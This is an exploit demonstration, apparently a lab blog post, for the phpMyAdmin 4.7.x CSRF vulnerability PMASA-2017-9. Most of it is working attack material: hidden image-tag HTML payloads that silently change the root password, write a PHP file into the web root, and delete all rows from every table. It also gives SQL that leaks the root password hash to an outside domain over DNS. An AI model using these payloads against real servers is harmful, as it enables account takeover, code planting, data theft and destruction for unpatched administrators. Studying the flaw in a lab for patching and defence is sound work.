phpMyAdmin 4.7.x XSRF/CSRF vulnerability (PMASA-2017-9)

A new Critical CSRF Vulnerability discovered in widely used phpMyAdmin open source admin tool allows an attacker perform harmful database operation such as DROP TABLE, MODIFY PASSWORD.

1 phpMyAmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)

phpMyAdmin is a well-known MySQL/MariaDB online management tool, phpMyAdmin team released the version 4.7.7 that addresses the CSRF vulnerability found by Barot. (PMASA-2017-9). The vulnerability allows an attacker to execute an arbitrary SQL statement silently by inducing an administrator to access malicious pages.

In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

VulnSpy's online phpMyAdmin environment address: https://www.vulnspy.com/?u=pmasa-2017-9

2 Exploit CSRF - Modifying the password of current user

Change the current user password to www.vulnspy.com, SQL command:

SET passsword=PASSWORD('www.vulnspy.com');

Exploit Demonstration

2.1 Log in to phpMyAdmin

Username: root Password: toor

phpMyAdmin

2.2 Create a page with malicious code.

Filename: 2.payload.html

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />

2.3 Open the file 2.payload.html in browser

2.payload.html

Go back to phpMyAdmin, you'll find that the account has been loged out automatically, and the password of root have been changed.

2.payload.html 2

2.4 Login successfully with the password www.vulnspy.com

Password Changed

3 Exploit CSRF - Arbitrary File Write

Write the code <?php phpinfo();?> to the file /var/www/html/test.php, SQL command:

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';

Exploit Demonstration

3.1 Payload

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

3.2 Open the file contain the payload in browser

3.3 Visit test.php

phpinfo()

4 Exploit CSRF - Data Retrieval over DNS

Steal the password hash of root, SQL command:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.vulnspy.com\\test'));

Fetch the current database name:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.vulnspy.com\\test'));

VSPlate not supports this exploit

5 Exploit CSRF - Empty All Rows From All Tables

Empty all rows from all tables, SQL command:

DROP PROCEDURE IF EXISTS EMPT;
DELIMITER $$
    CREATE PROCEDURE EMPT()
    BEGIN
        DECLARE i INT;
        SET i = 0;
        WHILE i < 100 DO
            SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
            PREPARE STMT FROM @del;
            EXECUTE STMT;
            SET i = i +1;
        END WHILE;
    END $$
DELIMITER ;

CALL EMPT();

Exploit Demonstration

5.1 Payload

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A" style="display:none;" />

5.2 Open the file contain the payload in browser

5.3 Go back to phpMyAdmin

You'll find the data in database vulnspy_tables and vulnspy_test have been deleted.

Empty DBS

GitHub Source

https://github.com/vulnspy/PMASA-2017-9

Reference

PMASA-2017-9 - https://www.phpmyadmin.net/security/PMASA-2017-9/
CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click! - https://securityaffairs.co/wordpress/67243/hacking/phpmyadmin-csrf-vulnerability.html
phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit - http://blog.vulnspy.com/2018/06/12/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-PMASA-2017-9-exploit/
phpMyAdmin 4.7.x CSRF 漏洞利用 - http://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/